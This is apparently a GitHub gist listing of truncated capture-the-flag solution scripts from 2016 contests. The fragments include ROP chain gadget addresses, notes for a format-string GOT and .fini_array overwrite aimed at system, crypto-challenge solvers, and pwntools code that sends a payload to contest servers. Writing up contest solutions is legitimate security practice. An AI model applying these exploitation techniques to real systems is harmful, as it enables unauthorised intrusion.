CreateRemoteThread
/ icectf-ropi-aborted.py
Created
August 30, 2016 11:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import struct | |
| ROP_REP = struct.pack("<L",0x0804847a) | |
| ROP_POP_EBX = struct.pack("<L",0x08048395) | |
| ROP_BREAK = struct.pack("<L",0xCCCCCCCC) | |
| ROP_READ_FLAG = struct.pack("<L",0x08048569) # RET | |
| ROP_READFD_FLAG_ARG2= struct.pack("<L",0x78563412) | |
| ROP_READ_FLAG_ARG = struct.pack("<L",0xBADBEEEF) |
CreateRemoteThread
/ twctf-reversebox.py
Created
September 5, 2016 10:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys | |
| print " [1] stage 1: rebuild encoding table with key = 0xd6" | |
| line = "5a1f4ef6f88630f04cb7cae5892a1de416f53a27288d4009036f3699afaedbef15e78e63069c569a31e664b558954904eedf7e0bb1729676ad23b02fb2a77a" | |
| alpha = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_" | |
| n = 2 |
CreateRemoteThread
/ twctf-twinprimes.py
Created
September 5, 2016 10:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import math | |
| def isqrt(n): | |
| x = n | |
| y = (x + 1) // 2 | |
| while y < x: | |
| x = y | |
| y = (x + n // x) // 2 |
CreateRemoteThread
/ twctf-superexpress.py
Created
September 5, 2016 10:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # shopping: | |
| # laundry detergent | |
| import string | |
| import sys | |
| key = [0] * 27 | |
| data = "805eed80cbbccb94c36413275780ec94a857dfec8da8ca94a8c313a8ccf9" |
CreateRemoteThread
/ twctf-greeting.py
Created
September 5, 2016 11:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # vulnerable overwrite is at | |
| # overwrite is at .fini_array | |
| # 0x08049934 & 36 (half-write each) | |
| # main location is 0x080485ED | |
| # printf got is 0x08049a38 | |
| # system got is 0x08049a48 | |
| # system@PLT = 0x8048496 |
CreateRemoteThread
/ tumctf-zwiebel.py
Created
October 3, 2016 00:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys | |
| import struct | |
| import binascii | |
| f = open("result.bin") | |
| data = bytearray(f.read()) | |
| f.close() |
CreateRemoteThread
/ tumctf-vuln.py
Created
October 3, 2016 00:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import os, binascii, struct | |
| from Crypto.Cipher import AES | |
| pad = lambda m: m + bytes([16 - len(m) % 16] * (16 - len(m) % 16)) | |
| def haggis(m): | |
| crypt0r = AES.new(bytes(0x10), AES.MODE_CBC, bytes(0x10)) | |
| return crypt0r.encrypt(len(m).to_bytes(0x10, 'big') + pad(m))[-0x10:] | |
| target = os.urandom(0x10) |
CreateRemoteThread
/ tumctf-v2.py
Created
October 3, 2016 00:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import os, binascii, struct | |
| import socket | |
| from Crypto.Cipher import AES | |
| import sys | |
| s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
| s.connect( ("104.198.243.170",2501) ) |
CreateRemoteThread
/ hackover-tinybackdoor.py
Created
October 10, 2016 09:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import pwn | |
| # print "\xE6\xD9\xF6\x38\x2A\x02\xFD\x3A\xC3" | |
| p = pwn.remote("challenges.hackover.h4q.it",4747) | |
| p.send("\xE6\xD9\xF6\x38\x2A\x02\xFD\x3A\xC3") | |
| print p.recv() |
CreateRemoteThread
/ ekoparty-pwn50.py
Created
October 28, 2016 23:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import pwn | |
| import copy | |
| d = open("data.bin") | |
| data = d.read() | |
| d.close() | |
| for i in range(0,len(data)): |